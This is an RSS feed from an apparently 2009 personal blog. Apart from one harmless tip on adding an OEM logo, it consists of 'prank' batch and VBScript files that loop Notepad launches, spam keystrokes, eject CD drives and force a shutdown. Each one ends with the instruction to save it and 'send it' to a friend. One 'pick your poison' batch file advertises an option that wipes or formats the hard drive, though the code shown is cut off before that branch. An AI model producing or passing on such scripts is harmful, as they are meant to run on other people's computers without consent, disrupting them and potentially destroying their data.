<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	>

<channel>
	<title>$ivaraj's Collections</title>
	<atom:link href="http://sivaraj1987.blog.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://sivaraj1987.blog.com</link>
	<description></description>
	<pubDate>Thu, 02 Jul 2009 11:21:42 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.7</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Add a photo to my computer properties</title>
		<link>http://sivaraj1987.blog.com/2009/06/13/add-a-photo-to-my-computer-properties/</link>
		<comments>http://sivaraj1987.blog.com/2009/06/13/add-a-photo-to-my-computer-properties/#comments</comments>
		<pubDate>Sat, 13 Jun 2009 02:49:05 +0000</pubDate>
		<dc:creator>sivaraj.ni2007</dc:creator>
		
		<guid isPermaLink="false">http://sivaraj1987.blog.com/?p=67</guid>
		<description><![CDATA[To do this:
1. Open Notepad.
2. Type the following:
[General]
Manufacturer= &#8220;your_name
3. Save as &#8220;oeminfo.ini&#8221; in the System32 folder.(Without Quote)
4. Create a bmp file(Your Photo) and save it the System32 folder as &#8220;oemlogo.bmp&#8221;(Without Quote).
The size of the image should be within 180 (wide) x120 (high) pixels
5. Now Check your My Computer Properties
]]></description>
			<content:encoded><![CDATA[<p>To do this:<br />
1. Open Notepad.<br />
2. Type the following:<br />
[General]<br />
Manufacturer= &#8220;your_name<br />
3. Save as &#8220;oeminfo.ini&#8221; in the System32 folder.(Without Quote)</p>
<p>4. Create a bmp file(Your Photo) and save it the System32 folder as &#8220;oemlogo.bmp&#8221;(Without Quote).<br />
The size of the image should be within 180 (wide) x120 (high) pixels</p>
<p>5. Now Check your My Computer Properties</p>
]]></content:encoded>
			<wfw:commentRss>http://sivaraj1987.blog.com/2009/06/13/add-a-photo-to-my-computer-properties/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5</title>
		<link>http://sivaraj1987.blog.com/2009/06/13/hard-prank-pick-your-poison-batch-file-it-asks-your-friend-to-choose-a-number-between-1-5/</link>
		<comments>http://sivaraj1987.blog.com/2009/06/13/hard-prank-pick-your-poison-batch-file-it-asks-your-friend-to-choose-a-number-between-1-5/#comments</comments>
		<pubDate>Sat, 13 Jun 2009 02:29:45 +0000</pubDate>
		<dc:creator>sivaraj.ni2007</dc:creator>
		
		<guid isPermaLink="false">http://sivaraj1987.blog.com/?p=59</guid>
		<description><![CDATA[1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions.
Beyond this point it is you that has the power to kill yourself. If you press &#8216;x&#8217; then your PC will be formatted.
Do not come crying to [...]]]></description>
			<content:encoded><![CDATA[<p>1: Shutdown<br />
2: Restart<br />
3: Wipes out your hard drive (BEWARE)<br />
4: Net send<br />
5: Messages then shutdown<br />
Type :</p>
<p>@echo off<br />
title The end of the world<br />
cd C:\<br />
:menu<br />
cls<br />
echo I take no responsibility for your actions.<br />
Beyond this point it is you that has the power to kill yourself. If you press &#8216;x&#8217; then your PC will be formatted.<br />
Do not come crying to me when you fried your computer or if you lost your project etc&#8230;<br />
pause<br />
echo Pick your poison:<br />
echo 1. Die this way (Wimp)<br />
echo 2. Die this way (WIMP!)<br />
echo 3. DO NOT DIE THIS WAY<br />
echo 4. Die this way (you&#8217;re boring)<br />
echo 5. Easy way out<br />
set input=nothing<br />
set /p input=Choice:<br />
if %input%==1 goto one<br />
if %input%==2 goto two</p>
<p>Save it as &#8220;Anything.BAT&#8221; and send it.</p>
]]></content:encoded>
			<wfw:commentRss>http://sivaraj1987.blog.com/2009/06/13/hard-prank-pick-your-poison-batch-file-it-asks-your-friend-to-choose-a-number-between-1-5/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Open Notepad continually in your friend&#8217;s computer</title>
		<link>http://sivaraj1987.blog.com/2009/06/12/open-notepad-continually-in-your-friends-computer/</link>
		<comments>http://sivaraj1987.blog.com/2009/06/12/open-notepad-continually-in-your-friends-computer/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 16:20:01 +0000</pubDate>
		<dc:creator>sivaraj.ni2007</dc:creator>
		
		<guid isPermaLink="false">http://sivaraj1987.blog.com/?p=56</guid>
		<description><![CDATA[@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as &#8220;Anything.BAT&#8221; and send it.
]]></description>
			<content:encoded><![CDATA[<p>@ECHO off<br />
:top<br />
START %SystemRoot%\system32\notepad.exe<br />
GOTO top</p>
<p>Save it as &#8220;Anything.BAT&#8221; and send it.</p>
]]></content:encoded>
			<wfw:commentRss>http://sivaraj1987.blog.com/2009/06/12/open-notepad-continually-in-your-friends-computer/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Hack your friend&#8217;s keyboard and make him type &#8220;You are a fool&#8221; simultaneously</title>
		<link>http://sivaraj1987.blog.com/2009/06/12/hack-your-friends-keyboard-and-make-him-type-you-are-a-fool-simultaneously/</link>
		<comments>http://sivaraj1987.blog.com/2009/06/12/hack-your-friends-keyboard-and-make-him-type-you-are-a-fool-simultaneously/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 16:12:21 +0000</pubDate>
		<dc:creator>sivaraj.ni2007</dc:creator>
		
		<guid isPermaLink="false">http://sivaraj1987.blog.com/?p=53</guid>
		<description><![CDATA[Set wshShell = wscript.CreateObject(&#8220;WScript.Shell&#8221;)
do
wscript.sleep 100
wshshell.sendkeys &#8220;You are a fool.&#8221;
loop
Save it as &#8220;Anything.VBS&#8221; and send it.
]]></description>
			<content:encoded><![CDATA[<p>Set wshShell = wscript.CreateObject(&#8220;WScript.Shell&#8221;)<br />
do<br />
wscript.sleep 100<br />
wshshell.sendkeys &#8220;You are a fool.&#8221;<br />
loop</p>
<p>Save it as &#8220;Anything.VBS&#8221; and send it.</p>
]]></content:encoded>
			<wfw:commentRss>http://sivaraj1987.blog.com/2009/06/12/hack-your-friends-keyboard-and-make-him-type-you-are-a-fool-simultaneously/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Frustrate your friend by making this VBScript hit Backspace simultaneously</title>
		<link>http://sivaraj1987.blog.com/2009/06/12/frustrate-your-friend-by-making-this-vbscript-hit-backspace-simultaneously/</link>
		<comments>http://sivaraj1987.blog.com/2009/06/12/frustrate-your-friend-by-making-this-vbscript-hit-backspace-simultaneously/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 15:54:18 +0000</pubDate>
		<dc:creator>sivaraj.ni2007</dc:creator>
		
		<guid isPermaLink="false">http://sivaraj1987.blog.com/?p=49</guid>
		<description><![CDATA[Type :
MsgBox &#8220;Let&#8217;s go back a few steps&#8221;
Set wshShell =wscript.CreateObject(&#8220;WScript.Shell&#8221;)
do
wscript.sleep 100
wshshell.sendkeys &#8220;{bs}&#8221;
loop
Save it as &#8220;Anything.VBS&#8221; and send it.
]]></description>
			<content:encoded><![CDATA[<p>Type :</p>
<p>MsgBox &#8220;Let&#8217;s go back a few steps&#8221;<br />
Set wshShell =wscript.CreateObject(&#8220;WScript.Shell&#8221;)<br />
do<br />
wscript.sleep 100<br />
wshshell.sendkeys &#8220;{bs}&#8221;<br />
loop</p>
<p>Save it as &#8220;Anything.VBS&#8221; and send it.</p>
]]></content:encoded>
			<wfw:commentRss>http://sivaraj1987.blog.com/2009/06/12/frustrate-your-friend-by-making-this-vbscript-hit-backspace-simultaneously/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Open Notepad, slowly type &#8220;Hello, how are you? I am good thanks&#8221; and freak your friend out</title>
		<link>http://sivaraj1987.blog.com/2009/06/12/open-notepad-slowly-type-hello-how-are-you-i-am-good-thanks-and-freak-your-friend-out/</link>
		<comments>http://sivaraj1987.blog.com/2009/06/12/open-notepad-slowly-type-hello-how-are-you-i-am-good-thanks-and-freak-your-friend-out/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 15:39:52 +0000</pubDate>
		<dc:creator>sivaraj.ni2007</dc:creator>
		
		<guid isPermaLink="false">http://sivaraj1987.blog.com/?p=45</guid>
		<description><![CDATA[Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(&#8220;WScript.Shell&#8221;)
WshShell.Run &#8220;notepad&#8221;
WScript.Sleep 100
WshShell.AppActivate &#8220;Notepad&#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;Hel&#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;lo &#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;, ho&#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;w a&#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;re &#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;you&#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;? &#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;I a&#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;m g&#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;ood&#8221;
WScript.Sleep 500
WshShell.SendKeys &#8221; th&#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;ank&#8221;
WScript.Sleep 500
WshShell.SendKeys &#8220;s! &#8221;
Save it as &#8220;Anything.VBS&#8221; and send it.
]]></description>
			<content:encoded><![CDATA[<p>Type :</p>
<p>WScript.Sleep 180000<br />
WScript.Sleep 10000<br />
Set WshShell = WScript.CreateObject(&#8220;WScript.Shell&#8221;)<br />
WshShell.Run &#8220;notepad&#8221;<br />
WScript.Sleep 100<br />
WshShell.AppActivate &#8220;Notepad&#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;Hel&#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;lo &#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;, ho&#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;w a&#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;re &#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;you&#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;? &#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;I a&#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;m g&#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;ood&#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8221; th&#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;ank&#8221;<br />
WScript.Sleep 500<br />
WshShell.SendKeys &#8220;s! &#8221;</p>
<p>Save it as &#8220;Anything.VBS&#8221; and send it.</p>
]]></content:encoded>
			<wfw:commentRss>http://sivaraj1987.blog.com/2009/06/12/open-notepad-slowly-type-hello-how-are-you-i-am-good-thanks-and-freak-your-friend-out/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Frustrate your friend by making this VBScript hit Enter simultaneously</title>
		<link>http://sivaraj1987.blog.com/2009/06/12/frustrate-your-friend-by-making-this-vbscript-hit-enter-simultaneously/</link>
		<comments>http://sivaraj1987.blog.com/2009/06/12/frustrate-your-friend-by-making-this-vbscript-hit-enter-simultaneously/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 15:30:32 +0000</pubDate>
		<dc:creator>sivaraj.ni2007</dc:creator>
		
		<guid isPermaLink="false">http://sivaraj1987.blog.com/?p=40</guid>
		<description><![CDATA[Type :
Set wshShell = wscript.CreateObject(&#8220;WScript.Shell&#8221;)
do
wscript.sleep 100
wshshell.sendkeys &#8220;~(enter)&#8221;
loop
Save it as &#8220;Anything.VBS&#8221; and send it.
]]></description>
			<content:encoded><![CDATA[<p>Type :</p>
<p>Set wshShell = wscript.CreateObject(&#8220;WScript.Shell&#8221;)</p>
<p>do</p>
<p>wscript.sleep 100</p>
<p>wshshell.sendkeys &#8220;~(enter)&#8221;</p>
<p>loop</p>
<p>Save it as &#8220;Anything.VBS&#8221; and send it.</p>
]]></content:encoded>
			<wfw:commentRss>http://sivaraj1987.blog.com/2009/06/12/frustrate-your-friend-by-making-this-vbscript-hit-enter-simultaneously/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Continually pop out your friend&#8217;s CD Drive. If he / she has more than one, it pops out all of them!</title>
		<link>http://sivaraj1987.blog.com/2009/06/12/continually-pop-out-your-friends-cd-drive-if-he-she-has-more-than-one-it-pops-out-all-of-them/</link>
		<comments>http://sivaraj1987.blog.com/2009/06/12/continually-pop-out-your-friends-cd-drive-if-he-she-has-more-than-one-it-pops-out-all-of-them/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 15:18:42 +0000</pubDate>
		<dc:creator>sivaraj.ni2007</dc:creator>
		
		<guid isPermaLink="false">http://sivaraj1987.blog.com/?p=36</guid>
		<description><![CDATA[Type :
Set oWMP = CreateObject(&#8220;WMPlayer.OCX.7&#8243;)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count &#62;= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as &#8220;Anything.VBS&#8221; and send it.
]]></description>
			<content:encoded><![CDATA[<p>Type :</p>
<p>Set oWMP = CreateObject(&#8220;WMPlayer.OCX.7&#8243;)</p>
<p>Set colCDROMs = oWMP.cdromCollection</p>
<p>do</p>
<p>if colCDROMs.Count &gt;= 1 then</p>
<p>For i = 0 to colCDROMs.Count - 1</p>
<p>colCDROMs.Item(i).Eject</p>
<p>Next</p>
<p>For i = 0 to colCDROMs.Count - 1</p>
<p>colCDROMs.Item(i).Eject</p>
<p>Next</p>
<p>End If</p>
<p>wscript.sleep 5000</p>
<p>loop</p>
<p>Save it as &#8220;Anything.VBS&#8221; and send it.</p>
]]></content:encoded>
			<wfw:commentRss>http://sivaraj1987.blog.com/2009/06/12/continually-pop-out-your-friends-cd-drive-if-he-she-has-more-than-one-it-pops-out-all-of-them/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Toggle your friend&#8217;s Caps Lock button simultaneously</title>
		<link>http://sivaraj1987.blog.com/2009/06/12/toggle-your-friends-caps-lock-button-simultaneously/</link>
		<comments>http://sivaraj1987.blog.com/2009/06/12/toggle-your-friends-caps-lock-button-simultaneously/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 15:11:43 +0000</pubDate>
		<dc:creator>sivaraj.ni2007</dc:creator>
		
		<guid isPermaLink="false">http://sivaraj1987.blog.com/?p=33</guid>
		<description><![CDATA[Type :
Set wshShell =wscript.CreateObject(&#8220;WScript.Shell&#8221;)
do
wscript.sleep 100
wshshell.sendkeys &#8220;{CAPSLOCK}&#8221;
loop
Save it as &#8220;Anything.VBS&#8221; and send it.
]]></description>
			<content:encoded><![CDATA[<p>Type :</p>
<p>Set wshShell =wscript.CreateObject(&#8220;WScript.Shell&#8221;)</p>
<p>do</p>
<p>wscript.sleep 100</p>
<p>wshshell.sendkeys &#8220;{CAPSLOCK}&#8221;</p>
<p>loop</p>
<p>Save it as &#8220;Anything.VBS&#8221; and send it.</p>
]]></content:encoded>
			<wfw:commentRss>http://sivaraj1987.blog.com/2009/06/12/toggle-your-friends-caps-lock-button-simultaneously/feed/</wfw:commentRss>
		</item>
		<item>
		<title>virus- Convey your friend a lil&#8217; message and shut down his / her computer</title>
		<link>http://sivaraj1987.blog.com/2009/06/12/virus-convey-your-friend-a-lil-message-and-shut-down-his-her-computer/</link>
		<comments>http://sivaraj1987.blog.com/2009/06/12/virus-convey-your-friend-a-lil-message-and-shut-down-his-her-computer/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 15:06:26 +0000</pubDate>
		<dc:creator>sivaraj.ni2007</dc:creator>
		
		<guid isPermaLink="false">http://sivaraj1987.blog.com/?p=29</guid>
		<description><![CDATA[open a notepad
Type :
@echo off
msg * I don&#8217;t like you
shutdown -c &#8220;Error! You are too stupid!&#8221; -s
Save it as &#8220;Anything.BAT&#8221; in All Files and send it.
run the anuthing.BAT&#8230;
]]></description>
			<content:encoded><![CDATA[<p>open a notepad</p>
<p>Type :</p>
<p>@echo off</p>
<p>msg * I don&#8217;t like you</p>
<p>shutdown -c &#8220;Error! You are too stupid!&#8221; -s</p>
<p>Save it as &#8220;Anything.BAT&#8221; in All Files and send it.</p>
<p>run the anuthing.BAT&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://sivaraj1987.blog.com/2009/06/12/virus-convey-your-friend-a-lil-message-and-shut-down-his-her-computer/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
